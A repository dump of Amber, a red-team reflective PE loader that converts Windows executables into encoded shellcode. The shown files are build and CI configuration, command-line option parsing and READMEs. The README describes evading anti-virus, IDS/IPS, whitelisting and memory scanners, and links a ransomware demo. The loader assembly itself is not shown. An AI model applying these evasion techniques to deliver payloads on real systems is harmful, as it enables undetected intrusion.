├── .github
├── img
│ ├── banner.png
│ ├── loader.png
│ └── usage.gif
└── workflows
│ └── main.yml
├── .gitignore
├── .gitmodules
├── .vscode
└── launch.json
├── Dockerfile
├── LICENSE
├── Makefile
├── README.md
├── config
└── options.go
├── go.mod
├── go.sum
├── loader
├── README.md
├── loader-x64
│ ├── amber_loader-x64-lite.bin
│ ├── build.sh
│ ├── inc
│ │ ├── calc_crc.asm
│ │ ├── get_module_by_crc.asm
│ │ ├── get_proc_by_crc.asm
│ │ ├── load_module.asm
│ │ ├── map_image.asm
│ │ ├── memcpy.asm
│ │ ├── protect_sections.asm
│ │ ├── relocate_image.asm
│ │ ├── resolve_imports.asm
│ │ └── run_tls_callbacks.asm
│ ├── loader-x64-lite.asm
│ ├── loader-x64.asm
│ └── stub.c
├── loader-x86
│ ├── amber_loader-x86-lite.bin
│ ├── build.sh
│ ├── inc
│ │ ├── calc_crc.asm
│ │ ├── get_module_by_crc.asm
│ │ ├── get_proc_by_crc.asm
│ │ ├── load_module.asm
│ │ ├── map_image.asm
│ │ ├── memcpy.asm
│ │ ├── protect_sections.asm
│ │ ├── relocate_image.asm
│ │ ├── resolve_imports.asm
│ │ └── run_tls_callbacks.asm
│ ├── loader-x86-lite.asm
│ ├── loader-x86.asm
│ └── stub.c
└── syscall-loader-x64
│ ├── build.sh
│ ├── inc
│ ├── calc_crc.asm
│ ├── get_module_by_crc.asm
│ ├── get_proc_by_crc.asm
│ ├── load_module.asm
│ ├── map_image.asm
│ ├── memcpy.asm
│ ├── protect_sections.asm
│ ├── relocate_image.asm
│ ├── resolve_imports.asm
│ └── run_tls_callbacks.asm
│ ├── stub.c
│ └── syscall-loader-x64.asm
├── main.go
├── pkg
├── amber.go
└── static.go
├── stub
├── Makefile
├── Resource.rc
├── amber.ico
└── stub.c
└── utils
└── helpers.go
/.github/img/banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/.github/img/banner.png
--------------------------------------------------------------------------------
/.github/img/loader.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/.github/img/loader.png
--------------------------------------------------------------------------------
/.github/img/usage.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/.github/img/usage.gif
--------------------------------------------------------------------------------
/.github/workflows/main.yml:
--------------------------------------------------------------------------------

name: build

on:
  push:
    branches: [ "master" ]

# NOTE(review): every action below is referenced by a mutable major tag (@v3).
# For supply-chain integrity, pin each `uses:` to a full commit SHA (keeping the
# tag in a trailing comment) so that a moved tag cannot change the code that
# runs with this repository's permissions.
jobs:
  linux-build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Set up Go
        uses: actions/setup-go@v3
        with:
          go-version: 1.19
      # install-keystone.sh is not among the files listed for this repository
      # snapshot; confirm it exists, otherwise the job fails at this step.
      - name: Install Keystone
        run: ./install-keystone.sh
      - name: Build for Linux
        run: make
      - name: 'Upload Artifact'
        uses: actions/upload-artifact@v3
        with:
          name: amber_linux
          path: amber
          retention-days: 5
  macos-run:
    runs-on: macos-latest
    steps:
      - uses: actions/checkout@v3
      - name: Set up Go
        uses: actions/setup-go@v3
        with:
          go-version: 1.19
      - name: Install Keystone
        run: ./install-keystone.sh
      - name: Build for MacOS
        run: make
      - name: 'Upload Artifact'
        uses: actions/upload-artifact@v3
        with:
          name: amber_darwin
          path: amber
          retention-days: 5

  windows-build:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v3
      - name: Set up Go
        uses: actions/setup-go@v3
        with:
          go-version: 1.19
      # Unlike the Linux and macOS jobs there is no Keystone install step here;
      # presumably the Windows toolchain provides it — confirm.
      - name: Build for Windows
        run: make
      - name: 'Upload Artifact'
        uses: actions/upload-artifact@v3
        with:
          name: amber.exe
          path: amber.exe
          retention-days: 5
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Created by .ignore support plugin (hsz.mobi)
2 | ### Go template
3 | # Binaries for programs and plugins
4 | *.exe
5 | *.exe~
6 | *.dll
7 | *.so
8 | *.dylib
9 | *.txt
10 |
11 | # Test binary, built with `go test -c`
12 | *.test
13 |
14 | # Output of the go coverage tool, specifically when used with LiteIDE
15 | *.out
16 |
17 | # Dependency directories (remove the comment below to include it)
18 | # vendor/
19 |
20 | .idea
21 |
22 | # vscode debug configs
23 | .vscode
24 | .vscode/*
25 |
26 | # BUILDS
27 | build
28 | stub/*.exe
29 | amber
30 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
# NOTE(review): the git:// transport is unauthenticated and unencrypted, and
# GitHub stopped serving it in 2022, so `git submodule update` fails until these
# URLs are switched to https://github.com/... — confirm before changing.
[submodule "CRC32_API"]
	path = loader/CRC32_API
	url = git://github.com/EgeBalci/CRC32_API.git

[submodule "IAT_API"]
	path = loader/IAT_API
	url = git://github.com/EgeBalci/IAT_API.git

--------------------------------------------------------------------------------
/.vscode/launch.json:
--------------------------------------------------------------------------------
1 | {
2 | // Use IntelliSense to learn about possible attributes.
3 | // Hover to view descriptions of existing attributes.
4 | // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
5 | "version": "0.2.0",
6 | "configurations": [
7 | {
8 | "name": "Launch",
9 | "type": "go",
10 | "request": "launch",
11 | "mode": "auto",
12 | "program": "${fileDirname}",
13 | "env": {},
14 | "args": ["-f","/tmp/putty.exe"]
15 | }
16 | ]
17 | }
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
# Stage 1: build keystone from source and link a static amber binary against it.
FROM golang:1.20 as builder

RUN apt-get update && apt-get -y install \
    build-essential \
    cmake \
    g++-multilib \
    gcc-multilib \
    git \
    libcapstone-dev \
    python3 \
    time
WORKDIR /root/
# NOTE(review): clones the default branch without a tag or commit, so the image
# is not reproducible and trusts whatever the remote serves at build time;
# consider checking out a fixed commit after the clone.
RUN git clone https://github.com/EgeBalci/keystone
RUN mkdir keystone/build
WORKDIR /root/keystone/build

RUN ../make-lib.sh
RUN cmake -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=OFF -DLLVM_TARGETS_TO_BUILD="AArch64;X86" -G "Unix Makefiles" ..
RUN make -j8
RUN make install && ldconfig

# RUN mkdir /root/amber
WORKDIR /root
# NOTE(review): amber itself is re-cloned from GitHub rather than COPYed from the
# build context, so local changes are never what gets built; the same pinning
# concern as above applies.
RUN git clone https://github.com/egebalci/amber
WORKDIR /root/amber
# Built without the Makefile's -X version flag, so --version reports the
# in-source default.
RUN go build -trimpath -buildvcs=false -ldflags="-extldflags=-static -s -w" -o /root/bin/amber main.go

# Stage 2: ship only the static binary.
FROM scratch
COPY --from=builder /root/bin/amber /amber
ENTRYPOINT ["/amber"]

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 Ege Balcı
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
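BUILD=go build
# -X only sets package-level string *variables*, and the symbol is addressed by
# the case-sensitive import path from go.mod (github.com/EgeBalci/amber); the
# lowercase path used previously did not match, so the override never applied.
# config.Version must be declared as a var for this to take effect.
BUILD_FLAGS=-trimpath -buildvcs=false -ldflags="-extldflags=-static -s -w -X github.com/EgeBalci/amber/config.Version=$$(git log --pretty=format:'v1.0.%at-%h' -n 1)"

default:
	${BUILD} ${BUILD_FLAGS} -o amber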
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | # Introduction
23 |
24 | Amber is a position-independent (reflective) PE loader that enables in-memory execution of native PE files (EXE, DLL, SYS...). It enables stealthy in-memory payload deployment that can be used to bypass anti-virus, firewall, IDS, IPS products, and application white-listing mitigations. Reflective payloads generated by Amber can either be staged from a remote server or executed directly in memory, much like generic shellcode. By default, every generated payload is encoded using the new-generation [SGN encoder](https://github.com/EgeBalci/sgn). Amber uses [CRC32_API](https://github.com/EgeBalci/crc32_api) and [IAT_API](https://github.com/EgeBalci/iat_api) for inconspicuously resolving the Windows API function addresses. After the PE file is loaded and executed in memory, the reflective payload is erased for evading memory scanners.
25 |
26 | # Installation
27 | Pre-compiled binaries can be found under [releases](https://github.com/EgeBalci/amber/releases).
28 |
29 | ***Building From Source***
30 |
31 | The only dependency for building from source is the [keystone engine](https://github.com/keystone-engine/keystone); follow [these](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE.md) instructions to install the library. Once libkeystone is installed on the system, simply go install it ツ
32 |
33 | ```
34 | go install github.com/EgeBalci/amber@latest
35 | ```
36 |
37 | ***Docker Install***
38 |
39 | [](https://hub.docker.com/r/egee/amber/)
40 |
41 | ```
42 | docker pull egee/amber
43 | docker run -it egee/amber
44 | ```
45 |
46 | # Usage
47 |
48 |
49 |
50 |
51 |
52 | The following table lists the switches supported by amber.
53 |
54 |
55 |
56 | Switch |
57 | Type |
58 | Description |
59 |
60 |
61 |
62 | -f,--file |
63 | string |
64 | Input PE file. |
65 |
66 |
67 |
68 | -o,--out |
69 | string |
70 | Output binary payload file name. |
71 |
72 |
73 |
74 | -e |
75 | int |
76 | Number of times to encode the generated reflective payload |
77 |
78 |
79 |
80 | --iat |
81 | bool |
82 | Use IAT API resolver block instead of CRC API resolver block |
83 |
84 |
85 |
86 | -l |
87 | int |
88 | Maximum number of bytes for obfuscation (default 5) |
89 |
90 |
91 |
92 | --sys |
93 | bool |
94 | Perform raw syscalls. (only x64) |
95 |
96 |
97 |
98 | --scrape |
99 | bool |
100 | Scrape magic byte and DOS stub from PE. |
101 |
102 |
103 |
104 |
105 |
106 | **Example Usage**
107 |
108 | - Generate reflective payload.
109 | ```
110 | amber -f test.exe
111 | ```
112 | - Generate reflective payload with IAT API resolver and encode the final payload 10 times.
113 | ```
114 | amber -e 10 --iat -f test.exe
115 | ```
116 |
117 | ***Docker Usage***
118 | ```
119 | docker run -it -v /tmp/:/tmp/ amber -f /tmp/file.exe
120 | ```
121 |
122 | # Demo
123 |
124 | - [NOPcon 2018 DEMO](https://www.youtube.com/watch?v=lCPdKSH6RMc)
125 | - [Pentest.blog - Deploying Reflective PE Files With Metasploit](https://www.youtube.com/watch?v=3en0ftnjEpE)
126 | - [Pentest.blog - Deploying Reflective Ransomware POC](https://www.youtube.com/watch?v=JVv_spX6D4U)
--------------------------------------------------------------------------------
/config/options.go:
--------------------------------------------------------------------------------
1 | package config
2 |
3 | import (
4 | "fmt"
5 | "os"
6 |
7 | "github.com/EgeBalci/amber/utils"
8 | "github.com/alecthomas/kong"
9 | )
10 |
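// Version is the amber release string reported by --version. It is a variable
// rather than a constant so that a build can override it with
// -ldflags "-X github.com/EgeBalci/amber/config.Version=<value>": the linker
// can only set string variables, and the import path must match go.mod exactly.
var Version = "3.2.0"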
12 |
// HelpPrompt is the kong help printer installed by Parse. It delegates to
// kong.DefaultHelpPrinter and passes its error (if any) straight through.
func HelpPrompt(options kong.HelpOptions, ctx *kong.Context) error {
	return kong.DefaultHelpPrinter(options, ctx)
}
20 |
// Config holds amber's command-line options as parsed by kong. The struct tags
// define the flag names, short aliases, help text and defaults; Parse fills
// the struct from os.Args.
type Config struct {
	FileName         string `help:"Input PE file name." name:"file" short:"f"`                                                // required: Parse aborts when empty
	OutputFile       string `help:"Output binary payload file name." name:"out" short:"o"`                                    // defaults to FileName + ".bin" in Parse
	EncodeCount      int    `help:"Number of times to encode the generated reflective payload." name:"encode" short:"e" default:"1"`
	ObfuscationLimit int    `help:"Maximum number of bytes for encoder obfuscation." name:"obfuscate-limit" short:"l" default:"5"`
	UseIAT           bool   `help:"Use IAT API resolver block instead of CRC API resolver block." name:"iat"`
	UseSyscalls      bool   `help:"Perform raw syscalls. (only x64)" name:"sys"`
	ScrapePeHeaders  bool   `help:"Scrape magic byte and DOS stub from PE." name:"scrape"`
	// IgnoreIntegrity bool `help:"Ignore PE file integrity check errors." name:"ignore"`
	Verbose          bool   `help:"Verbose mode." name:"verbose" short:"v"`
	Version          kong.VersionFlag // --version; the text comes from kong.Vars{"version": Version} in Parse
}
34 |
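// Parse reads the command-line flags from os.Args into a Config.
//
// Errors from kong (unknown flags, bad values) are returned to the caller. A
// missing input file (-f) is reported on stderr together with the usage text
// and ends the process with exit status 1, which is the behaviour callers
// already rely on. A negative encode count or obfuscation limit is returned as
// an error. When no output file is given, "<input>.bin" is used.
func Parse() (*Config, error) {
	cfg := new(Config)
	parser, err := kong.New(
		cfg,
		kong.Help(HelpPrompt),
		kong.UsageOnError(),
		kong.Vars{"version": Version},
		kong.ConfigureHelp(kong.HelpOptions{
			Summary: true,
		}),
	)
	if err != nil {
		return nil, err
	}
	// Keep the parse context: it is what prints usage below. The earlier
	// kong.Help(HelpPrompt) call at that point only constructed an Option and
	// never printed anything.
	ctx, err := parser.Parse(os.Args[1:])
	if err != nil {
		return nil, err
	}

	if cfg.FileName == "" {
		utils.PrintErr("no file specified! (-f )\n")
		// Best effort: a failure to render usage must not hide the real problem.
		_ = ctx.PrintUsage(false)
		os.Exit(1)
	}

	if cfg.EncodeCount < 0 {
		return nil, fmt.Errorf("encode count must not be negative: %d", cfg.EncodeCount)
	}
	if cfg.ObfuscationLimit < 0 {
		return nil, fmt.Errorf("obfuscation limit must not be negative: %d", cfg.ObfuscationLimit)
	}

	if cfg.OutputFile == "" {
		cfg.OutputFile = cfg.FileName + ".bin"
	}

	return cfg, nil
}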
70 |
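// PrintSummary writes the effective options through utils.PrintStatus: input
// and output file, encode count, obfuscation limit, the selected API resolver,
// and the raw-syscall and header-scrape switches when they are enabled. The
// output file and scrape flag were previously missing from the summary.
func (cfg *Config) PrintSummary() {
	utils.PrintStatus("File: %s\n", cfg.FileName)
	utils.PrintStatus("Output: %s\n", cfg.OutputFile)
	utils.PrintStatus("Encode Count: %d\n", cfg.EncodeCount)
	utils.PrintStatus("Obfuscation Limit: %d\n", cfg.ObfuscationLimit)
	resolver := "CRC"
	if cfg.UseIAT {
		resolver = "IAT"
	}
	utils.PrintStatus("API Resolver: %s\n", resolver)
	if cfg.UseSyscalls {
		utils.PrintStatus("Raw Syscalls: True\n")
	}
	if cfg.ScrapePeHeaders {
		utils.PrintStatus("Scrape PE Headers: True\n")
	}
}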
84 |
--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
1 | module github.com/EgeBalci/amber
2 |
3 | go 1.15
4 |
5 | require (
6 | github.com/EgeBalci/debug v0.0.0-20201116162432-d79a6eb18848
7 | github.com/EgeBalci/sgn v0.0.0-20231219142414-258f3083dba2
8 | github.com/alecthomas/kong v0.8.1
9 | github.com/briandowns/spinner v1.23.0
10 | github.com/fatih/color v1.16.0
11 | github.com/mattn/go-runewidth v0.0.15 // indirect
12 | github.com/olekukonko/tablewriter v0.0.5 // indirect
13 | github.com/rivo/uniseg v0.4.7 // indirect
14 | github.com/sirupsen/logrus v1.9.0
15 | golang.org/x/sys v0.17.0 // indirect
16 | golang.org/x/term v0.17.0 // indirect
17 | )
18 |
--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
1 | github.com/EgeBalci/debug v0.0.0-20201116162432-d79a6eb18848 h1:xp+mcTlDdvF6gCe/eSkaDmpQ4Kd7zUAPLZxPfqNjvWA=
2 | github.com/EgeBalci/debug v0.0.0-20201116162432-d79a6eb18848/go.mod h1:7fXlZBJFFub/8MYzeBI6HFwNkwL2cw8pe3yrWTJduwc=
3 | github.com/EgeBalci/keystone-go v0.0.0-20200525180613-e6c7cd32ceae h1:IMOEVXYMrzHg+1oWgTYBEwzMGsxFHUgoreu2Ic62K7Q=
4 | github.com/EgeBalci/keystone-go v0.0.0-20200525180613-e6c7cd32ceae/go.mod h1:/HCfOmUN3INldcXC0YnFrOtOw3MuRFEQ9cKTT5fZuQ8=
5 | github.com/EgeBalci/sgn v0.0.0-20201126033925-686e60d127dc h1:OVYO6tY6ivMDvT/np+bKnkUSIgHRJ4S7hAGcd1ylas8=
6 | github.com/EgeBalci/sgn v0.0.0-20201126033925-686e60d127dc/go.mod h1:gI4nYEhbKmf35Q+NPyoX+o1ajkCgabjYjsyu19tmfgM=
7 | github.com/EgeBalci/sgn v0.0.0-20231219142414-258f3083dba2 h1:v0YrXqe3w4KGVUH5D/MxBhIQH16nZ5yBZ+zTC8KI2Nk=
8 | github.com/EgeBalci/sgn v0.0.0-20231219142414-258f3083dba2/go.mod h1:NROZGYB3DOyRBNWm7joLs64Zdu3MOBybtmxepm/D2Tc=
9 | github.com/alecthomas/assert/v2 v2.1.0 h1:tbredtNcQnoSd3QBhQWI7QZ3XHOVkw1Moklp2ojoH/0=
10 | github.com/alecthomas/assert/v2 v2.1.0/go.mod h1:b/+1DI2Q6NckYi+3mXyH3wFb8qG37K/DuK80n7WefXA=
11 | github.com/alecthomas/kong v0.7.1 h1:azoTh0IOfwlAX3qN9sHWTxACE2oV8Bg2gAwBsMwDQY4=
12 | github.com/alecthomas/kong v0.7.1/go.mod h1:n1iCIO2xS46oE8ZfYCNDqdR0b0wZNrXAIAqro/2132U=
13 | github.com/alecthomas/kong v0.8.1 h1:acZdn3m4lLRobeh3Zi2S2EpnXTd1mOL6U7xVml+vfkY=
14 | github.com/alecthomas/kong v0.8.1/go.mod h1:n1iCIO2xS46oE8ZfYCNDqdR0b0wZNrXAIAqro/2132U=
15 | github.com/alecthomas/repr v0.1.0 h1:ENn2e1+J3k09gyj2shc0dHr/yjaWSHRlrJ4DPMevDqE=
16 | github.com/alecthomas/repr v0.1.0/go.mod h1:2kn6fqh/zIyPLmm3ugklbEi5hg5wS435eygvNfaDQL8=
17 | github.com/briandowns/spinner v1.11.1 h1:OixPqDEcX3juo5AjQZAnFPbeUA0jvkp2qzB5gOZJ/L0=
18 | github.com/briandowns/spinner v1.11.1/go.mod h1:QOuQk7x+EaDASo80FEXwlwiA+j/PPIcX3FScO+3/ZPQ=
19 | github.com/briandowns/spinner v1.23.0 h1:alDF2guRWqa/FOZZYWjlMIx2L6H0wyewPxo/CH4Pt2A=
20 | github.com/briandowns/spinner v1.23.0/go.mod h1:rPG4gmXeN3wQV/TsAY4w8lPdIM6RX3yqeBQJSrbXjuE=
21 | github.com/coreos/go-systemd/v22 v22.5.0/go.mod h1:Y58oyj3AT4RCenI/lSvhwexgC+NSVTIJ3seZv2GcEnc=
22 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
23 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
24 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
25 | github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
26 | github.com/fatih/color v1.10.0 h1:s36xzo75JdqLaaWoiEHk767eHiwo0598uUxyfiPkDsg=
27 | github.com/fatih/color v1.10.0/go.mod h1:ELkj/draVOlAH/xkhN6mQ50Qd0MPOk5AAr3maGEBuJM=
28 | github.com/fatih/color v1.16.0 h1:zmkK9Ngbjj+K0yRhTVONQh1p/HknKYSlNT+vZCzyokM=
29 | github.com/fatih/color v1.16.0/go.mod h1:fL2Sau1YI5c0pdGEVCbKQbLXB6edEj1ZgiY4NijnWvE=
30 | github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA=
31 | github.com/hexops/gotextdiff v1.0.3 h1:gitA9+qJrrTCsiCl7+kh75nPqQt1cx4ZkudSTLoUqJM=
32 | github.com/hexops/gotextdiff v1.0.3/go.mod h1:pSWU5MAI3yDq+fZBTazCSJysOMbxWL1BSow5/V2vxeg=
33 | github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
34 | github.com/mattn/go-colorable v0.1.8 h1:c1ghPdyEDarC70ftn0y+A/Ee++9zz8ljHG1b13eJ0s8=
35 | github.com/mattn/go-colorable v0.1.8/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc=
36 | github.com/mattn/go-colorable v0.1.13 h1:fFA4WZxdEF4tXPZVKMLwD8oUnCTTo08duU7wxecdEvA=
37 | github.com/mattn/go-colorable v0.1.13/go.mod h1:7S9/ev0klgBDR4GtXTXX8a3vIGJpMovkB8vQcUbaXHg=
38 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
39 | github.com/mattn/go-isatty v0.0.12 h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY=
40 | github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU=
41 | github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM=
42 | github.com/mattn/go-isatty v0.0.19/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
43 | github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
44 | github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
45 | github.com/mattn/go-runewidth v0.0.7 h1:Ei8KR0497xHyKJPAv59M1dkC+rOZCMBJ+t3fZ+twI54=
46 | github.com/mattn/go-runewidth v0.0.7/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
47 | github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
48 | github.com/mattn/go-runewidth v0.0.15 h1:UNAjwbU9l54TA3KzvqLGxwWjHmMgBUVhBiTjelZgg3U=
49 | github.com/mattn/go-runewidth v0.0.15/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
50 | github.com/olekukonko/tablewriter v0.0.4 h1:vHD/YYe1Wolo78koG299f7V/VAS08c6IpCLn+Ejf/w8=
51 | github.com/olekukonko/tablewriter v0.0.4/go.mod h1:zq6QwlOf5SlnkVbMSr5EoBv3636FWnp+qbPhuoO21uA=
52 | github.com/olekukonko/tablewriter v0.0.5 h1:P2Ga83D34wi1o9J6Wh1mRuqd4mF/x/lgBS7N7AbDhec=
53 | github.com/olekukonko/tablewriter v0.0.5/go.mod h1:hPp6KlRPjbx+hW8ykQs1w3UBbZlj6HuIJcUGPhkA7kY=
54 | github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
55 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
56 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
57 | github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc=
58 | github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ=
59 | github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88=
60 | github.com/rs/xid v1.5.0/go.mod h1:trrq9SKmegXys3aeAKXMUTdJsYXVwGY3RLcfgqegfbg=
61 | github.com/rs/zerolog v1.31.0/go.mod h1:/7mN4D5sKwJLZQ2b/znpjC3/GQWY/xaDXUM0kKWRHss=
62 | github.com/sirupsen/logrus v1.9.0 h1:trlNQbNUG3OdDrDil03MCb1H2o9nJ1x4/5LYw7byDE0=
63 | github.com/sirupsen/logrus v1.9.0/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ=
64 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
65 | github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY=
66 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
67 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
68 | golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
69 | golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
70 | golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
71 | golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
72 | golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
73 | golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
74 | golang.org/x/sys v0.7.0 h1:3jlCCIQZPdOYu1h8BkNvLz8Kgwtae2cagcG/VamtZRU=
75 | golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
76 | golang.org/x/sys v0.12.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
77 | golang.org/x/sys v0.14.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
78 | golang.org/x/sys v0.15.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
79 | golang.org/x/sys v0.17.0 h1:25cE3gD+tdBA7lp7QfhuV+rJiE9YXTcS3VG1SqssI/Y=
80 | golang.org/x/sys v0.17.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
81 | golang.org/x/term v0.1.0/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
82 | golang.org/x/term v0.17.0 h1:mkTF7LCd6WGJNL3K1Ad7kwxNfYAW6a8a8QqtMblp/4U=
83 | golang.org/x/term v0.17.0/go.mod h1:lLRBjIVuehSbZlaOtGMbcMncT+aqLLLmKrsjNrUguwk=
84 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
85 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
86 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
87 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
88 |
--------------------------------------------------------------------------------
/loader/README.md:
--------------------------------------------------------------------------------
1 | # Amber Loader v3.0
2 |
3 | Amber Loader is a reflective PE loader designed for manually loading (mapping, relocating, and resolving) and executing PE files from memory. It is written fully in assembly using the NASM syntax. The loader supports both 32- and 64-bit PE files with TLS callbacks and forwarded imports.
4 |
5 |
6 |
7 |
8 |
9 |
10 | The lite version of the Amber loader can be placed directly in front of a PE file (prepended to it) to convert the file into shellcode.
11 |
12 |
